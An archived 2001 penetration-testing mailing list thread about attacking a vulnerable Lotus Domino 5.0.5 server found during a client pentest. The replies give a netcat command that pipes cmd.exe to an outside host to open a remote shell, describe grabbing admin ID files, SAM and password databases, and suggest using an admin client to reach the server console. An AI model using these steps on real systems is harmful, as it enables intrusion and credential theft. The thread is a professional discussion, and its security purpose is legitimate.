Penetration Testing mailing list archives
Re: Hacking Lotus Domino 5.0.5
From: "High Speed" <at_high_speed () hotmail com>
Date: Tue, 16 Oct 2001 22:38:24 +0200
on a NT server : If you can gain access as an Notes administrator (sometimes the id files are saved inside names.nsf) then you can set up an admin client, go to the remote Notes server console, type c:\winnt\system32\cmd.exe and look what happens....
From: "'ken'@FTU" <franklin_tech_bulletins () yahoo com> To: renato.ettisberger () ch pwcglobal com CC: PEN-TEST () securityfocus com Subject: Re: Hacking Lotus Domino 5.0.5 Date: Mon, 15 Oct 2001 19:33:31 -0400 I suspect from your email that your Domino server is on an NT box as opposed to an AS/400. If it's a 400 your somewhat out of luck because few, if any, tools exist for 400 hacking. If its NT here's an idea: If you can place a file on the machine put netcat on the machine.You can then get a shell back with the command: nc foo.com [your inbound port] | cmd.exe | nc foo.com [your outbount port] you can now send commands to your inbound port and watch the result on your out bound port. You can always search for buffer overflows. If one is found you could possibly excute commands, or do other stuff, within the server's permission level. Hope this helps. 'ken' renato.ettisberger () ch pwcglobal com wrote:Hi I'm doing a pen test for a client. They have many systems in the dmz, including some nt/win2k boxes running IIS. Unfortunately, all IIS are patched :-(. But I found a vulnerable Domino 5.0.5 Server. I was able todownload some nice files like names.nsf, the sam-file in winnt/repair and a admin.nsf with all user names and passwords. I think, that's a finding :-),but I want more.Is there a way to get a shell? I'm able to create files on the server or atleast I can fill out a question form. Can I use this to create a file or execute a command (I don't think so, but maybe...)? Or does anybody know some other stuff, that I can do? As you can see, I'm not a pro in Lotus Domino. Thanks for your help regards Renato ---------------------------------------------------------------- The information transmitted is intended only for the person or entity to which it is addressed and may contain confidential and/or privileged material. Any review, retransmission, dissemination or other use of, or taking of any action in reliance upon, this information by persons orentities other than the intended recipient is prohibited. If you receivedthis in error, please contact the sender and delete the material from any computer. ----------------------------------------------------------------------------This list is provided by the SecurityFocus Security Intelligence Alert (SIA)Service. For more information on SecurityFocus' SIA service whichautomatically alerts you to the latest security vulnerabilities please see:https://alerts.securityfocus.com/----------------------------------------------------------------------------This list is provided by the SecurityFocus Security Intelligence Alert (SIA)Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
_________________________________________________________________ Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- Hacking Lotus Domino 5.0.5 renato.ettisberger (Oct 15)
- Re: Hacking Lotus Domino 5.0.5 'ken'@FTU (Oct 15)
- <Possible follow-ups>
- Re: Hacking Lotus Domino 5.0.5 jjore (Oct 16)
- Re: Hacking Lotus Domino 5.0.5 High Speed (Oct 16)
- Re: Hacking Lotus Domino 5.0.5 Josh Daymont (Oct 18)